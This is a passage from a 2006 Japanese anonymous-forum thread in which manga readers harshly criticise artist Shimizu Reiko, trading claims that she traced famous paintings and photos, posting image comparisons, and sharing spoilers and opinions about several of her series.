雑誌は捨てちゃって現存してないので検証出来ません、よかったねシミズン
拾い上げてみたら3〜5巻には無いみたいだから当時でも投書あったんだろうか

108 :花と名無しさん:2006/08/25(金) 06:46:12 ID:???0
>>67
このばやいミシェルはエレナかJだろな。最後頭潰されちゃうけど。

109 :花と名無しさん:2006/08/25(金) 08:22:34 ID:???0
>>107
乙です

清水、小ゴマ以外は全部目トレスなんじゃないかという勢いだな。
松本洋子以来のトレース作家だな。

110 :花と名無しさん:2006/08/25(金) 10:17:31 ID:???0
>>95
<まゆの存在が蔑ろにされちゃったのがなぁ…
晶も 「この想いは誰にも言えない」とか、凄くいい雰囲気だったのに

ホンと、そうだよ。まゆが襲われちゃったところで、唖然としたよ。
作者のキャラに対する仕打ちの酷さに。。。

月はまだ、サブキャラも最後は死んじゃったりするけど、それなりに
全うした美しさが伴ってたし、
それぞれの想いの切なさがきちんと描写されてたから共感できた

111 :花と名無しさん:2006/08/25(金) 15:42:40 ID:???0
月も局部だけいいところがあるけど全体が…

その局部はまた何かのインスパイヤ?という気もするんだよね。
絵だけじゃなくて、話もそのときその場で萌えたものに影響されて
マネするから。

まあ絵はもう論外。

112 :花と名無しさん:2006/08/25(金) 16:51:55 ID:???0
>>107
あーやっぱりというラインナップですね。
自分が良いと思う構図は他人だって印象深いんだから
プロならあえて避けなきゃ。

>まゆ暴行
絵に生気が無いから性的な描写は正直白ける。
生々しくなくて良いとも言えるけど、じゃーなんであんなエピソードが
必要だったんだろう?
軽んじて描いてるようで嫌悪感を持ったよ。

113 :花と名無しさん:2006/08/25(金) 20:11:27 ID:???0
ここは人格障害の美学者と図像学者の集うスレですか?
なんかもうぐちゃぐちゃで・・・・・
ここまできたら神手塚のトレス批判にでも進んで下さい。

114 :花と名無しさん:2006/08/25(金) 20:16:15 ID:???0
ぐちゃぐちゃなのはシミズンの絵柄だ。
人体がとんでもない事になってる時あるよ。

115 :花と名無しさん:2006/08/25(金) 20:43:16 ID:???0
だよな。骨格おかしい。

116 :花と名無しさん:2006/08/25(金) 22:05:05 ID:???0
耳もおかしいし。

全ての布がぎゅうぎゅうだ。

117 :花と名無しさん:2006/08/25(金) 23:26:56 ID:???0
>>113
どちらかと言うと元シミズファンだった人たちが
色々とガカーリする結果を見つけだしてしまう
自虐的なスレですよ。
昔は知らなかったからアラこの絵ステキ!と思ったけど…
て感じで。知らなかったあの頃は良かった。
家具屋はいきなりグダグダだけどな。

手塚さんは興味ないからどうでもいい。

118 :花と名無しさん:2006/08/26(土) 01:07:32 ID:???0
ここは釣堀か…っていうね

119 :花と名無しさん:2006/08/26(土) 08:34:14 ID:???0
家具屋、中盤からキャラの顔が混乱していたな。
顔の描き分けすらおぼつかなくなってきた。
頭はだんだんでかくなるし首は細く長く伸びまくるし。

120 :花と名無しさん:2006/08/26(土) 13:40:37 ID:???0
それなのに目の下睫だけ写真マネしたりするから余計に気持ち悪い。

そういや耳もブタの鼻のままで全くリアルにならないね。
何でそこだけ頑固なんだろう。

121 :花と名無しさん:2006/08/26(土) 15:08:11 ID:???0
定期的に儲がわくのも汚水スレの定例行事だね

>>107
扉ですらそんなに目トレだらけとはw
中の決めゴマも当然…だろうな
竜の世界観って結構特別なもので
あれはほとんどが、あのローマ時代の布だらけみたいな衣装と
あの建築物とあのトレス葉っぱと恐竜の風景から成り立ってるよね
衣装はパク、建築物もおそらく完全パク
さすがに漫画家に建築デザインは期待できないしね
だけどそれなら巻末に参考文献とかいれりゃいいのに全く皆無なんだよな…
他の作家は結構ズラズラって並べるものなんだが

122 :花と名無しさん:2006/08/26(土) 15:24:55 ID:???0
べつにここアンチスレじゃないし…

123 :花と名無しさん:2006/08/26(土) 16:46:23 ID:???0
>>122
マンセースレでも無いね。

儲か本人か知らんが、またそうやってると検証始まるのになあ。

124 :花と名無しさん:2006/08/26(土) 19:59:12 ID:???0
シミズンひょっとしてピックル頼んでるんじゃないだろーなw

125 :花と名無しさん:2006/08/26(土) 20:52:29 ID:???0
シミズンに嵐とか熱い書き込みをするファンはいないと思うんだよなあ。
真面目に。
若い・熱い・ファンなんか、昔からいなかったような……
(自分も含めて…すかした人が多かったようなww)

チュプにしては夜にも活動してるし、やっぱ本人とか身内?とか思ってしまう。

126 :花と名無しさん:2006/08/27(日) 00:23:45 ID:???0
ピックル頼むんなら白癬では。メロが新人作家たちがぱっとしないから大御所はまだ大切だろうし。
一条ゆかりが叩かれてたときピックル雇ったのは集英社だったそうだから。

127 :花と名無しさん:2006/08/29(火) 17:20:56 ID:???0
検証さんのところに投稿できなかったのでこっちにお借りしてうぷって
おきました。
アルマ・タデマ関係の、清水の画像と合わせたものです。
http://salon.s57.xrea.com/file/index.html

投稿できるかた、検証さんのBBSにお願いします。

(それと、何か加工した方がいい点があればお願いします)

しかし並べるとスゴスww
本当に絵で物真似したいだけでウワッツラにシーン書いてるよなあ。
モニクが座ってる絵とか椅子、傾いてるし(´∀`)

128 :花と名無しさん:2006/08/29(火) 18:03:46 ID:???0
>>127さん、乙。

モニークが座ってるの、悲惨だなぁ。
本物の方が当然だが、構図なんかがずっと洗練されてる。
清水の方は劣化コピーだ…本人、むなしくならんのか?
自分で自分の好きな絵を劣化させたもの見て満足か?理解できん。

129 :603 ◆8osC5Yqr.I :2006/08/29(火) 19:06:03 ID:???0
検証ブログ管理人です。

>>127
乙です、画像いただきました。とても見易いです。
他にご意見がなければこの画像で差し替えたいと思います。

それと画像投稿BBSですが、アップできない方が多いので
投稿PASSを入れなくてもアップできるようにしてみました。

問題がない間はPASS無にしておきます。


130 :花と名無しさん:2006/08/29(火) 21:50:40 ID:???0
127>>129
お疲れ様です。ありがとうございました。
すみません、自分で投稿するべきだったのですが、何故だか出来なくて。
お手数おかけしました。

また何か加工するべきものがあったらやって、投稿させていただこうと思います。

>>128
並べて見てしんみりしましたよー。
自分がいいなと思ったところ、好きだなと思ったところは殆ど全部原典のものだ
ったんだなあと思いました。

すごく細かい、洒落てるところだけまんまパクってるのも嫌悪感大きいですね…
インテリアとか。

131 :花と名無しさん:2006/08/30(水) 13:20:50 ID:???0
既に全てにおいて「シミズンだしね」で片付けられる自分が通りますよ

132 :花と名無しさん:2006/08/30(水) 13:52:16 ID:???0
>>131
しかしまさかここまでと毎回溢れ出るパク指摘に恐ろしくなってきました。

松本洋子……

133 :花と名無しさん:2006/08/30(水) 17:12:43 ID:???0
ホントに比べてみるとすごい、傾いてるっつーか歪んでる…

134 :花と名無しさん:2006/08/30(水) 17:55:48 ID:???0
秘密どうなりましたか

うちの近所の本屋メロ置いてないので親切な方教えてください

135 :花と名無しさん:2006/08/30(水) 21:38:14 ID:???0
バレスレに載ってない?一応間隔空けて簡易バレ
























片岡、眠っているチャッピーを撲殺(その後、仕掛けられていた映像によって
中身が愛だったことを知る)。
薪・青木は五年前の幼児のバラバラ遺体を病院内の冷凍庫から回収。
頭部が残っていたのでMRIへ。
以下次号

136 :花と名無しさん:2006/08/30(水) 21:49:52 ID:???0
ワイルドキャットの完全版出てたんだね
思わずスルーしちゃったよ

137 :花と名無しさん:2006/08/31(木) 00:53:04 ID:???0
あれもパクだしねえ……

138 :花と名無しさん:2006/08/31(木) 11:38:59 ID:???O
>>136
完全版出すほど人気なのか…?
そっちの方が驚きだ。

139 :花と名無しさん:2006/08/31(木) 15:48:42 ID:???0
僕札…用事バラバラ…
今回と次回は読まんとこ orz

140 :花と名無しさん:2006/08/31(木) 18:09:58 ID:???0
確かに、チラッと見た時、え、誤爆?って思った
んで上みたら、簡単バレって。。。一体どんな少女マンガなんだよ
近未来ホラー猟奇殺人サスペンス?
すごい、少女マンガを完全に超えてるね
それがシミズンのねらいなんだろうけど
でも、超え方間違ってるって思うのは自分だけ?

第一話の読みきりは感動したんだけどなぁ
大統領の恋はちょっと無理があったけど
読唇術師の秘められた気持ちの切なさがよかった
いずれにしても、「秘密」がちゃんとモチーフになってた

今の「秘密」は、犯罪の秘密ばっか。
犯罪はそりゃふつう、秘密だらけだろうけど


141 :花と名無しさん:2006/08/31(木) 18:11:30 ID:MSscJwWN0
>>139
ヌルくてヘボかったよ。

いっそグロならグロで思い切りやってくれたら好きなんだが。
そういう層からは鼻で笑われとる。

142 :134:2006/08/31(木) 18:47:08 ID:???0
>>135
バレありがとうございました。遅くなってすみません。

バレスレではメロのはいつも大奥しか出ていないので。

143 :花と名無しさん:2006/08/31(木) 18:56:46 ID:OhNGmACr0
輝夜姫今読んだ。
終わり方が非道〜〜〜〜〜い。
あんなにいたたまれない思いをする必要があるんか?
特にミラーさん・・・ 他のキャラもだけどさ。
こんな風に思うこと自体私の精神が未熟だからなんだろうけど
こういういたたまれない思いを残す終わり方ってやだなぁ。痛い。

144 :花と名無しさん:2006/09/01(金) 01:39:51 ID:???O
自分もかぐやひめはラストに納得できなかった
なんか何が何だかページはしょって無理矢理終らせた感があって「?」が多く残った

145 :花と名無しさん:2006/09/01(金) 01:53:15 ID:???0
ラスト以外は納得出来たのか…

むしろラスト以外のほうがワケわかんなかったよー。

146 :花と名無しさん:2006/09/01(金) 04:46:13 ID:???0
ワイルドキャットって何のパク?

147 :花と名無しさん:2006/09/01(金) 11:11:17 ID:???0
過去スレさかのぼってみて。私は見られないのでどこだか教えられん。

148 :花と名無しさん:2006/09/01(金) 14:24:57 ID:???0
おまいら家具屋で良かったシーンを挙げてください。

149 :花と名無しさん:2006/09/01(金) 17:37:24 ID:???0
>>148
1巻のあのパステル画っぽいところは正直最初「おお!」と思った。
……んだけどね。

150 :花と名無しさん:2006/09/01(金) 17:54:07 ID:???0
(ノ∀`) アチャー

おお!と思ったものは全部…

151 :603 ◆8osC5Yqr.I :2006/09/01(金) 19:40:59 ID:???0
検証ブログ管理人です。

本日>>127さんの画像に差し替えさせていただきました。
とても見易いです、ありがとうございました。

152 :花と名無しさん:2006/09/02(土) 02:54:58 ID:???0
>>151
お疲れ様です。
しかし増えましたね……

まだまだ出てくる一方になりそうなあたりがいやだなあ、ドロミズ…

153 :花と名無しさん:2006/09/02(土) 18:55:26 ID:???0
皆様のパクパク情報を見ながら

・・・・・だ;だったら山田ミネコなんか背景ぜーーーーんぶ某有名建築家(日生劇場の人)の建物ばっかじゃん??
て、山田ミネコなんて知らない世代かもしれないな;;・・。

154 :花と名無しさん:2006/09/02(土) 18:58:20 ID:???0
>>153
他スレにどうぞ。

155 :花と名無しさん:2006/09/02(土) 19:05:08 ID:???0
どこから迷い込んできた人だろ?メロ読者とも思えないし。

156 :花と名無しさん:2006/09/02(土) 19:13:48 ID:???0
>>153
ストーリーパク検証のが面白いかもしれんけど
絵のが証拠がすぐ出せていい感じなわけよ
言いたいことと違う?だったらスマンね

それより今月の秘密、なんかここ最近のでは獄門塾殺人事件並のがっかり具合だ
一体何にどっきりしろというのか…先の見える展開はつまらない

157 :花と名無しさん:2006/09/02(土) 19:13:56 ID:???0
つーか誰だ、山田ミネコって。

その人の作家スレでやればいいのに。

158 :花と名無しさん:2006/09/02(土) 19:15:16 ID:???0
>>153
昔の人なの?昔は結構緩かったからねえ。

ドロミズさんは最近なんだよ。
最近もやってるんだよ。

しかも「背景」じゃなくて一々決めゴマなんだよなあw

159 :花と名無しさん:2006/09/02(土) 19:16:10 ID:???0
>>67
ソ連のSF小説で現在翻訳本は図書館の倉庫か参考図書に眠ってそーな早川書房世界SF全集第24巻に収められてるもののみ。
題名が難解そうだが 破滅する漢のロマンとなすすべもなく見守るしかない主人公達。培養した脳神経細胞から新たに脳髄を作るとどうなるかって話。
美形はライモンとミシェル位か。
エレナの顔で「私は人間ではありません。私は脳だけです。あとは人工物。」とか
・・・言われてもインパクトないな〜。もともとロボットだし。

160 :花と名無しさん:2006/09/02(土) 20:18:35 ID:???0
山田ミネコって漫画家だったような…違ったかな
麻城ゆうの小説の挿絵とか描いてた気がする

161 :花と名無しさん:2006/09/02(土) 20:22:03 ID:???0
まだ続けるの

162 :花と名無しさん:2006/09/03(日) 02:39:31 ID:???0
儲は擁護したいなら秘密のネタバレに「うわあ!面白そう!次号どうなるんだろう!
メロディ買わなきゃ!」とか反応してあげればいいと思う。

163 :花と名無しさん:2006/09/03(日) 03:10:43 ID:???0
>>160
昔プリンセスとかで描いてた漫画家だよー。

164 :花と名無しさん:2006/09/03(日) 13:07:15 ID:???0
>>158
ああ、レイアウトとかがって話か・・・・納得。

165 :花と名無しさん:2006/09/03(日) 14:10:39 ID:???0
>>164
レイアウト?

166 :花と名無しさん:2006/09/03(日) 14:11:55 ID:???0
>>164
検証サイトくらい見たらいいのに

167 :花と名無しさん:2006/09/03(日) 14:41:11 ID:???0
必死になってる儲か本人だろ(´∀`)

ここで火消ししてももう無理だと思うんだけどなあ。
清水のパクは有名だから。

168 :花と名無しさん:2006/09/03(日) 17:00:06 ID:???0
気に入らないレスは全て本人か儲か主婦のせいにする香具師乙

169 :花と名無しさん:2006/09/03(日) 17:27:03 ID:???0
>>162
>161に対して言ってる?
山田ミネコと清水玲子は関係ないと思ってレスしたんだけど

170 :花と名無しさん:2006/09/03(日) 19:24:09 ID:???0
>>168
清水には今更ピックルも使わないだろうし。

171 :花と名無しさん:2006/09/03(日) 21:05:16 ID:???0
ピックルって……(・∀・)ナニ?

172 :花と名無しさん:2006/09/04(月) 01:35:54 ID:???0
ワイルドキャッツ完全版買った
シーザーがサバンナに帰る準備とかいう設定はどうなったんだって感じ
8年目にして初めて発情なんておかしいし
あんなのにお金出した姉ってバカ

173 :花と名無しさん:2006/09/04(月) 12:32:30 ID:???0
まあそう言ってやるなよ。

174 :花と名無しさん:2006/09/05(火) 01:27:56 ID:???0
172の姉さんカワイソス

草食動物ならともかく、捕食動物の場合
人間に育てられた個体が自然に帰るのはほぼ無理。

175 :花と名無しさん:2006/09/05(火) 20:47:56 ID:???0
>>174
手話を教えられたチンパンジーの末路を思い出して欝。

ワイルドキャッツって動物に対する考え方が馬鹿にしすぎてて、
パクリ知る前から腹立ってならん漫画だったな。
盲導犬の話とかなんなんだ。清水って基本的に犬ひどい扱いのような。

176 :花と名無しさん:2006/09/05(火) 20:59:35 ID:???0
かわいいペットをこんな風に残酷に描写できるあたしってカッコヨス
みたいなあざとさがあるな。

177 :花と名無しさん:2006/09/05(火) 21:46:57 ID:???0
もっと単純で動物出しておけばお涙頂戴ラクチン!
くらいにしか思ってなさそう。

178 :花と名無しさん:2006/09/05(火) 23:34:04 ID:???0
ワイルドキャッツで良かった点は
・劇中のTVで巨人が大連敗中
・悪役上級生の名前が元木
ってトコぐらいかな。

179 :花と名無しさん:2006/09/06(水) 00:44:57 ID:???0
>>177
リア厨でリスカとかやって悪ぶってるガキみたいだね……

180 :花と名無しさん:2006/09/08(金) 17:00:36 ID:???0
普通の人のあったかいところって描けないんだと思った。
「ワイルドキャッツ」や「サイレント」とか、家族を描いても
愛情、感情のない空々しい雰囲気しか感じない。

感情移入させる技術がないから、グロや奇抜な設定でつかむしかないみたいな。

181 :花と名無しさん:2006/09/08(金) 17:49:01 ID:???0
>>180
竜の眠る星の王女様と死んだモニークのシーンは良かったなとは思う・・

182 :花と名無しさん:2006/09/08(金) 20:35:33 ID:PbO9x2o50
厨2病なんでしょう。

グロとかエロも描けちゃうアテクシ。
少女マンガ家の枠にはとどまらないわよ、アテクシ。
みたいな(´∀`)

183 :花と名無しさん:2006/09/08(金) 21:04:24 ID:???0
>>181
うん、ところどころ良いシーンはあったよね
この作者は、確かに人の普通の温かさは描けないけど、
切なさは昔は上手かったと思う。




184 :花と名無しさん:2006/09/08(金) 21:53:44 ID:???O
あたしは、ノアの宇宙船の「夢物語だと」と、ロイに云われるジュニアの顔がただただ泣ける。
あと、月の子は、総てはセツとショナのラストシーンの前振りだったとしか思えないくらい、最終回は泣けた。

185 :花と名無しさん:2006/09/08(金) 22:35:51 ID:???0
読み返すとそうでもなくなってた。
自分も中二病だったのかな、当時orz

話もパク癖があるので疑わしいしね。

でもそれ以前になんかこう、「ご都合」というか……作者の狙いが透けて
見えちゃって駄目だったなあ。

186 :花と名無しさん:2006/09/08(金) 22:54:18 ID:???0
部分的に良くても全体がアレだからなあ。

187 :花と名無しさん:2006/09/08(金) 23:43:20 ID:???0
近視の人は部分的にものを見る傾向があるそうだ。

188 :花と名無しさん:2006/09/09(土) 02:34:34 ID:???0
輝夜姫、最後意味がわからんかったです
ミラーは最後ボケとったん?
なんでミラーだけ残されるの?

189 :花と名無しさん:2006/09/09(土) 11:20:23 ID:???0
いちおう「かぐや姫は月に帰りましたとさ」とゆう場面を入れて
タイトルとのつじつま合わせをするため

190 :花と名無しさん:2006/09/09(土) 22:21:10 ID:???0
>総てはセツとショナのラストシーンの前振りだったとしか思えないくらい、最終回は泣けた。
セツとショナのためだけに読み返すな月の子。
輝夜姫は絵が綺麗だ。もうイイや・・・とうに本棚から消えた。

191 :花と名無しさん:2006/09/10(日) 12:28:29 ID:???0
>>181
竜〜は全作品の中でも1.2を争う特殊世界観の展示場だよ
建築物、風俗、風景、動植物、服装、小道具etc..
1人のまともな漫画家ですらこれらをオリジナルで網羅するのは厳しいのに
パクラー常習犯の汚水さんがパクらずにやれたと思う?
検証BBS見る限り、私はとてもそうは思えない
なんてことないひとコマですら絵画のまるパクだったんだから
いわんや名シーンをや、ですよ…
あれも絶対に映画か絵画か雑誌かポスターなどで元ネタがあると思ってます

192 :花と名無しさん:2006/09/10(日) 13:24:23 ID:???0
>竜〜は全作品の中でも1.2を争う特殊世界観の展示場だよ
>建築物、風俗、風景、動植物、服装、小道具etc..

>建築物、 アルマ・タデマ・ミュシャ
>風俗、 アルマ・タデマ・ミュシャ
>風景、 アルマ・タデマ・ミュシャ・田中一村
>動植物、 田中一村
>服装、 アルマ・タデマ・ミュシャ・田中一村・森英恵
>小道具 アルマ・タデマ・ミュシャ

はっきりしてるのでもこれだもんなあ。

個人的にまだネタ元があるだろうと思ってるのは、建造物と服装……
途中辺りで傾向が変わってるんだよね。それで当時から違和感があった。
例えていうと、書院造の中に寝殿造りっつーか、ロココん中に一部ゴシック、
みたいな……普通同じ「傾向」で統一するもんだから。
何かネタ元変わってんだと思う。

あの、モニク引きずりシーンの大階段もずーっと気になってる。
何か記憶にあるんだよ。ああいう階段とあの背景。

193 :花と名無しさん:2006/09/10(日) 13:58:01 ID:???0
>あの、モニク引きずりシーンの大階段もずーっと気になってる。
>何か記憶にあるんだよ。ああいう階段とあの背景。

ぐわーあそこがパクだったらもう立ち直れない。それでなくても、「竜の〜」の
一連のパクには本気で凹んでるのに。絵画の構図ごと決めゴマでパクるのは、
ミュシャの服をキャラに着せるのとは根本的に違うものを感じるよ。


194 :花と名無しさん:2006/09/10(日) 14:02:42 ID:???0
決めゴマでパクるのって清水先生の十八番じゃないんすか?

195 :花と名無しさん:2006/09/10(日) 14:50:57 ID:???0
>>193
でも記憶にあるんだよ、ガッチリw

しかも何か淡いピンクっぽいイメージなんだよね。
キラキラしてる雰囲気で。
アニメなのか、絵画なのか…

構図ごと決めゴマパクリは竜が絶頂って気もするんだけど。
今まで上がったものを見ると。

196 :花と名無しさん:2006/09/11(月) 02:35:45 ID:???0
>>191
いいシーン、てのは構図・レイアウトだけじゃないと思うんだけどなぁ。
ストーリーの上でもいいシーンだと思うけど、モニークの死体運び。
これで「擁護」とかいうのは勘弁してねw 全然そういうつもりじゃないからさ。

197 :花と名無しさん:2006/09/11(月) 03:32:28 ID:???0
>>196
191タンではないが。

マンガだと「いいシーン」って絵(その線から構図・効果等まで)と言葉、文字
のフォント、そんな色々なものを構成要素にするね。
で、絵は特に大事だよね。
その大事な絵をパクってくるので「いいシーン」もパクリになっちゃうって言って
んじゃないの?

モニクの死体運びシーンはあのミュシャドレスだからこそ破れるところに悲哀
があるんだし、あの大階段のあの構図じゃなきゃ意味無いわけで。
あの大階段までパクリだと強烈だよね、でもそれっぽいよねって話では。

198 :花と名無しさん:2006/09/11(月) 04:27:40 ID:???0
あの階段運びシーン、カテア女王がモニークをものっそい愛してたことが
初めてわかる(でももう遅すぎる)・・・・ってシーンだよね。
だから、例えば小説だったとしても、あのシーンでは自分は泣くと思う。

ただあれは漫画という表現方法が採られていて、視覚的効果も問われる。
その視覚的効果=絵の部分で、ドレスも大階段も借り物だとしたら、
やっぱりちょっとモニョっとしたものは感じざるを得ない。ショックだなあ。

仮に大階段に元の絵があって、その構図を清水さんが見た時に、
「女王が愛娘の死体を引きずる」っていう物語が浮かんだのだとしたら、
そのイマジネーション能力には感心する。
けど漫画として描く時には、構図は変えてほしいなあ、と思う。


199 :花と名無しさん:2006/09/11(月) 04:34:50 ID:???0
「小説だったら」はとりあえず意味無いと思う。
表現技法が違うので。

マンガ作品である「竜」の中であそこが「いい」と見えたならそれは絵やら
構図まで含めた話だから、絵だの構図だのパクってりゃパクリだろ。

196の言い方で言うと、いいシーン、てのは構図・レイアウトだけじゃないけど、
構図・レイアウト抜いては考えられんほど大事なことだと思うんだけどなぁ。

200 :花と名無しさん:2006/09/11(月) 04:38:48 ID:zbynJ1Gf0
>>198
思ったんだけど。

「大階段絵」+「誰かを引きずって運ぶ絵」=茂肉死体シーンかもよ。

あ、これに更に+「ミュシャドレス」で。


今まで決めゴマ殆どやらかしてきてるんで信じられないんだよおおおおおお!!!!
大階段、見覚えがあるって人もいるそうだしいいいいいいい!!!!
くそうー!好きだった時期あったんだけどな、昔はorz

201 :花と名無しさん:2006/09/11(月) 04:39:35 ID:???0
て、あー、ごめん、茎切れてる。
しかも茂肉ってご、ごめん(T∀T)
モニークのーが抜けたまま変換してた……もう寝るポ。

202 :花と名無しさん:2006/09/11(月) 04:54:14 ID:???0
>>199
どうかなー、女性が少女の死体を運んでいる、
ってだけのシーンならば、
同じ絵と構図でも「いいシーン」には
ならなかったんじゃないかな。

「小説なら」ってのは、ストーリー的な部分のことじゃない?
としたらまあ、無意味とは思わないけど。

>>200さんの言う通り、大階段にも引きずる図にもドレスにも
元ネタがあったとしても、
構図丸写しじゃなくてきちんと変えてあったなら、
ぎりぎり、モティーフが同じだね、で済んだとオモ。

203 :花と名無しさん:2006/09/11(月) 06:17:07 ID:???0
>>202
あの絵と構図がなきゃ「いいシーン」だとは思わなかったなあ。

マンガだから絵とか構図とかレイアウトは切り離して考えられない。
それをキリバリでどっかかららパクってきちゃうのが変。

204 :花と名無しさん:2006/09/11(月) 13:24:04 ID:???0
万が一あの名シーンが完全オリジナルだとして、だ
それでもこうやって疑われるのも疑う方が悪いと思えない
パクはこわいよ〜一度でもバレると他の部分も「パクかも」と読者に疑わせてしまうところがな
反省…はしてなそうだ

ところで竜最終巻で姉が産み月とかいう女王付き人のロングヘアーの女性
最終便に間に合ったんだろうかって昔からずーッと気になってるw
「ここはもういいから早くいきなさい」っていわれてるのと
同時進行で最終便の機内の様子がコマにあるから
あのあとダッシュで空港いっても間に合ったのかとても心配してる
車とか馬車とかあったのかな…あの風俗状況で
城の近くに空港建設を許可するとも思えないし、もし間に合わなかったらorz

205 :花と名無しさん:2006/09/11(月) 17:17:21 ID:???0
パクって癖になるからなあ。

小説家でもマンガ家でも一回やった奴が一回きりってことがないんだよね。
そして癖になって劣化の一途。
盗癖みたいなもんなんだろうな。

206 :花と名無しさん:2006/09/11(月) 21:30:53 ID:???0
204サン、ヤサシス

207 :花と名無しさん:2006/09/11(月) 21:41:55 ID:???0
月下美人での、花と同化したようなアマンダのショットもパクリかな。
表紙が丸パクだったようだし。

208 :花と名無しさん:2006/09/14(木) 19:25:26 ID:???0
WILD CATS完全版読んだけど、遠藤淑子の「さびしがりやの彼女」
の方がストーリーも読後感もはるかに好きだった
まあ絵は苦手なひともいるんだろうけど
てか、これかなり似てるよな

209 :花と名無しさん:2006/09/15(金) 00:11:41 ID:???0
どんなんだったっけ?
エバンジェリン?姫シリーズでは象とかお城に連れてきてたなぁ


210 :花と名無しさん:2006/09/15(金) 12:35:00 ID:???0
ここで遠藤淑子が出てくるとは思わなかったなw

211 :花と名無しさん:2006/09/15(金) 16:41:56 ID:???0
遠藤さんは話は上手いから記憶に残ってるんだろうなあ。


212 :花と名無しさん:2006/09/15(金) 19:30:03 ID:???0
あの絵の下手さ加減がまた、話とマッチしてるかも
清水の絵で描くと嘘くさくなってしまうというか。。。
遠藤さんの絵でやるから逆に本物っぽいっていうか
不思議と感情移入できてしみじみしたものが心に残るなぁ
ある意味対極にある漫画家だね。


213 :花と名無しさん:2006/09/15(金) 20:53:36 ID:???0
>>209
ひょんなことから町中で飼われてるユキヒョウ視点の話。
文庫に入ってたかどうか忘れた。単行本は「ラッコはじめました」に入ってる。

絵が写真からのパクなのもワイルドキャッツに感情移入しにくい原因かもしれないけど、
それよりただの感動させるための「材料」としてしか扱われていないようなのが
気になって気になって。(他の作品の盲導犬しかり)

214 :花と名無しさん:2006/09/15(金) 20:57:07 ID:???0
遠藤さんの原稿を見た事があるんだけど、
絵は確かに下手なんだけど、凄い綺麗な原稿だった。
華があるというか、そのまま部屋に飾ってもおかしくないくらい。
やっぱりこれがプロなんだな〜と思ったよ。

清水たんは一見すばらしく美しい画面なんだけど…。

215 :花と名無しさん:2006/09/15(金) 22:40:17 ID:???0
本当に逆だね。

清水さんの生原稿、見たことあるけどなんかぼさぼさっとした感じというか……
当時結構ファンだったけどガッカリしたのを覚えている。

その頃、大和和紀・萩尾望都さんとか数人のを続けて見る機会があったん
だけどずば抜けてヘタクソに見えた思い出。


216 :花と名無しさん:2006/09/16(土) 16:41:16 ID:???0
シミズンの場合「描く対象」にも「描くこと」にも愛情が感じられないんだよなあ。
「上手いと言われるような絵を描く」ことには熱心なように見えるけど。

217 :花と名無しさん:2006/09/16(土) 20:42:56 ID:???0
しかもパクってまでね……


218 :花と名無しさん:2006/09/17(日) 14:42:09 ID:???O
magicがすごく好きなんだけどこれもパクリなの?
話がうまくまとまってて
初めて読んだとき衝撃を受けたのを覚えてる。

219 :花と名無しさん:2006/09/17(日) 22:42:48 ID:???0
疑惑はあるよ

220 :花と名無しさん:2006/09/17(日) 23:56:09 ID:???0
>216
ものすごく解かる。
たまにすごい緻密な絵を描くけど(家具屋の戴冠式のような)
「すごい絵」を描ける自分を証明できればそれで良い。
でも「すごい絵」を描くのは別段楽しくも無い、愛も無い、面倒くさい。
そしてコピー多用。
そんな感じ。

221 :花と名無しさん:2006/09/18(月) 00:18:04 ID:???0
絵を描くことを自己表現の一つとして考えるなら、
緻密さやペンタッチの美しさより
構図や人物のポーズを練る過程こそもっとも重要だよね。
それを面倒くさがって他人のフンドシ借りてばっかり、
絵だけじゃなくストーリーの方も同様、となれば
なんのために漫画家になったのと問い詰めたくなる。
プロアシ向きの性格だったんじゃない?

222 :花と名無しさん:2006/09/18(月) 00:20:32 ID:???0
いや、アシという職業をバカにしてるわけじゃなくて。
誤解を招く表現だったらスマソ

223 :花と名無しさん:2006/09/18(月) 01:21:32 ID:???0
結局は漫画に対してもナマケモノだったってことか。

224 :花と名無しさん:2006/09/18(月) 01:38:54 ID:???0
怠けてはいなかっただろうけど
頑張る方向性が読者の求めるものの斜め下
……どころか直滑降状態だった…んじゃね?

225 :花と名無しさん:2006/09/18(月) 07:22:02 ID:???0
>>221
しかも生原稿だとペンタッチ綺麗じゃない罠。


226 :花と名無しさん:2006/09/18(月) 19:33:21 ID:???0
イラストレーターの方が向いてるような気もする。

227 :花と名無しさん:2006/09/18(月) 19:41:49 ID:???0
構図を自分で考えずに絵画や写真からパクってるから無理では>イラストレーター

228 :花と名無しさん:2006/09/18(月) 21:18:20 ID:???0
>>204
亀だけど、有閑倶楽部の剣菱家のパターンで、宮殿から空港までの秘密の地下通路があって
女王付き人はそこから空港に行ったんじゃないの?

229 :花と名無しさん:2006/09/18(月) 21:42:48 ID:???0
そういう通路があったとしても
普通は王族以外は使えない仕様になってると思うんだが

非常時だし、みんなして使ってそのまま鍵が開きっぱなしとかありそうだがなー

230 :花と名無しさん:2006/09/18(月) 23:35:17 ID:???0
動物とか可愛いキャラが得意というわけでもなく(アイコちゃんの手抜き加減…)
人体の基本的なプロポーションすら把握しておらず、かといってデフォルメが出来るわけでもなく、
色彩感覚が特に個性的だったり優れてたりということも無く(塗りは丁寧だけど、それだけ)
肝心の構図やポーズに関しては自分で創ろうという意欲すらない…

絶対無理ですな>イラストレーター

231 :花と名無しさん:2006/09/18(月) 23:53:59 ID:???0
>デフォルメ

むしろ  す  ご  く  ヘ  タ  ク  ソ  だと思いませんか?

いや、だってこの人の描く子ども……
あの気持ち悪くて可愛げの欠片もない子ども……


232 :花と名無しさん:2006/09/19(火) 00:08:26 ID:???0
月の子の時のバレエのポーズは多分目トレースじゃなくて本トレースだね。
こいつにあれが描ける訳無い気がしてきたよ。
例の階段で死体を運ぶシーンの大階段は良く見たらパース変だね。
冬木るりか位のレベル。

233 :花と名無しさん:2006/09/19(火) 00:12:22 ID:???0
月の子のバレエ、衣装に特徴あったよね。

うpを待つよ。それから探す。
どうせバレエに関しちゃメジャーどころから盗んでるだろうしよー(´∀`)


234 :花と名無しさん:2006/09/19(火) 06:54:30 ID:???O
そういえばバレエ関連あがってこないね。
自分もそうだが詳しい人がいないんだろう。
もう十五年前のことだから雑誌とか残ってるかどうか。

235 :花と名無しさん:2006/09/19(火) 15:17:22 ID:???0
ダンス板から来てる人いませんか〜?

236 :花と名無しさん:2006/09/19(火) 16:02:06 ID:???0
>>235
ノシ

ドロミズ本を捨てちゃったので分からないのです。
もう昔の雑誌類も捨ててしまったし……
でも見たら思い出して探せるんじゃないかと。

237 :花と名無しさん:2006/09/20(水) 18:02:59 ID:???0
バレエに関しちゃ好きなダンサーの名前は書きまくってたような。
多少は手がかりになるかも。
そういえば一時期フィギュアスケートにも萌えー萌えー騒いでたっけ。

238 :花と名無しさん:2006/09/21(木) 18:03:28 ID:???0
シミズンの場合
本当に好きなダンサーの名前は書いていないと予想

